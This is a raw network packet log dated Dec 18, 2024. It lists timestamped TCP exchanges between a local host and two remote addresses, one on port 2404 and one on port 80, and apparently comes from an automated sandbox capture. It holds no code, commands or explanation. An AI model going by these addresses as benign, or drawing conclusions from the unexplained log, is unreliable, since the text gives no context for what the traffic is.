                                                            Dec 18, 2024 11:05:17.268297911 CET240449874212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:17.337861061 CET240449874212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:17.339261055 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:17.390131950 CET498742404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:17.459137917 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:17.459238052 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:17.462903976 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:17.488167048 CET4988180192.168.2.6178.237.33.50
                                                            Dec 18, 2024 11:05:17.582542896 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:17.608058929 CET8049881178.237.33.50192.168.2.6
                                                            Dec 18, 2024 11:05:17.608140945 CET4988180192.168.2.6178.237.33.50
                                                            Dec 18, 2024 11:05:17.608278036 CET4988180192.168.2.6178.237.33.50
                                                            Dec 18, 2024 11:05:17.727814913 CET8049881178.237.33.50192.168.2.6
                                                            Dec 18, 2024 11:05:18.619187117 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:18.671683073 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:18.856240988 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:18.863697052 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:18.878010988 CET8049881178.237.33.50192.168.2.6
                                                            Dec 18, 2024 11:05:18.878130913 CET4988180192.168.2.6178.237.33.50
                                                            Dec 18, 2024 11:05:18.899667025 CET498742404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:18.983248949 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:18.983355999 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.019308090 CET240449874212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.102971077 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.341979980 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.342048883 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.342063904 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.342097044 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.342164040 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.342179060 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.342196941 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.342204094 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.342355013 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.380297899 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.380343914 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.380440950 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.382599115 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.382694960 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.382900000 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.391011000 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.391057968 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.391103983 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.461592913 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.461746931 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.461815119 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.533015013 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.533071041 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.533126116 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.535479069 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.535526991 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.535617113 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.543946981 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.544122934 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.544193029 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.552290916 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.552315950 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.552395105 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.560745955 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.560779095 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.560847998 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.569118023 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.571435928 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.571541071 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.571603060 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.578618050 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.578758001 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.578774929 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.585139036 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.585217953 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.585278034 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.593636990 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.593720913 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.593781948 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.601941109 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.602014065 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.602072001 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.608921051 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.608990908 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.609049082 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.615952969 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.616024971 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.616099119 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.622958899 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.623042107 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.724193096 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.724291086 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.724374056 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.726645947 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.727504969 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.727581978 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.727628946 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.732448101 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.732502937 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.732557058 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.737297058 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.737337112 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.737349033 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.742294073 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.742338896 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.742388964 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.746910095 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.746953964 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.747011900 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.751523018 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.751568079 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.751614094 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.755908012 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.755995035 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.756016970 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.760231018 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.760277987 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.760370970 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.764590979 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.764642954 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.765737057 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.765825033 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.765872002 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.770061016 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.770142078 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.770250082 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.774405956 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.774518013 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.774564981 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.778814077 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.778912067 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.778966904 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.783109903 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.783200979 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.783250093 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.787473917 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.787587881 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.787633896 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.792047977 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.792063951 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.792117119 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.796137094 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.796269894 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.796351910 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.800493002 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.800589085 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.800627947 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.804919958 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.804991961 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.805066109 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.809171915 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.809361935 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.809499025 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.813548088 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.813703060 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.813966990 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.817815065 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.817965984 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.818008900 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.822148085 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.822236061 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.822309017 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.879089117 CET8049881178.237.33.50192.168.2.6
                                                            Dec 18, 2024 11:05:19.879177094 CET4988180192.168.2.6178.237.33.50
                                                            Dec 18, 2024 11:05:19.915818930 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.915880919 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.915932894 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.917516947 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.917692900 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.917771101 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.921103954 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.921124935 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.921175003 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.924282074 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.924478054 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.924526930 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.927687883 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.927889109 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.927956104 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.931090117 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.931238890 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.931291103 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.934231997 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.934250116 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.934319019 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.937875986 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.937891960 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.937946081 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.953663111 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.953706980 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.953819036 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.955022097 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.955097914 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.955198050 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.957986116 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.958038092 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.958297014 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.960989952 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.961040974 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.961142063 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.963784933 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.963901043 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.963953972 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.966689110 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.966815948 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.966917038 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.969686985 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.969737053 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.969840050 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.972559929 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.972636938 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.972727060 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.975397110 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.975486994 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.975528002 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.978286982 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.978416920 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.978465080 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.981188059 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.981316090 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.981539965 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.984142065 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.984225988 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.984267950 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.987029076 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.987181902 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.987222910 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.989995956 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.990134954 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.990181923 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.992964029 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.993021965 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.993211031 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.995752096 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.995877981 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.995985031 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.998678923 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.998765945 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.998809099 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.001698017 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.001785994 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.001828909 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.004592896 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.004641056 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.004729033 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.007433891 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.007606030 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.007649899 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.010360956 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.010457039 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.010509014 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.013226032 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.013329983 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.013395071 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.016161919 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.016191959 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.016391993 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.018985033 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.019120932 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.019172907 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.021929026 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.022042990 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.022089005 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.024857998 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.025104046 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.025160074 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.027719021 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.027751923 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.027812004 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.030678988 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.030742884 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.030783892 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.033575058 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.033653975 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.033705950 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.036483049 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.036540031 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.036600113 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.039413929 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.039449930 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.039504051 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.042269945 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.093220949 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.106617928 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.106698990 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.106761932 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.107357025 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.107388973 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.107496023 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.110121965 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.110233068 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.110366106 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.113135099 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.113166094 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.113234043 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.115789890 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.115911961 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.115994930 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.118638992 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.118675947 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.118837118 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.121423960 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.121481895 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.121570110 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.123830080 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.124011040 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.124070883 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.126384020 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.126441956 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.126493931 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.128787994 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.128887892 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.128966093 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.131263971 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.131396055 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.131455898 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.133635998 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.133691072 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.133768082 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.136034966 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.136070967 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.136128902 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.138181925 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.138349056 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.138412952 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.140487909 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.140619040 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.140738964 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.142693043 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.142786026 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.142846107 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.144902945 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.145010948 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.145076036 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.146532059 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.146698952 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.146881104 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.148546934 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.148648977 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.148801088 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.150691032 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.150799990 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.150861979 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.152781010 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.152879953 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.152940989 CET498802404192.168.2.6212.162.149.91
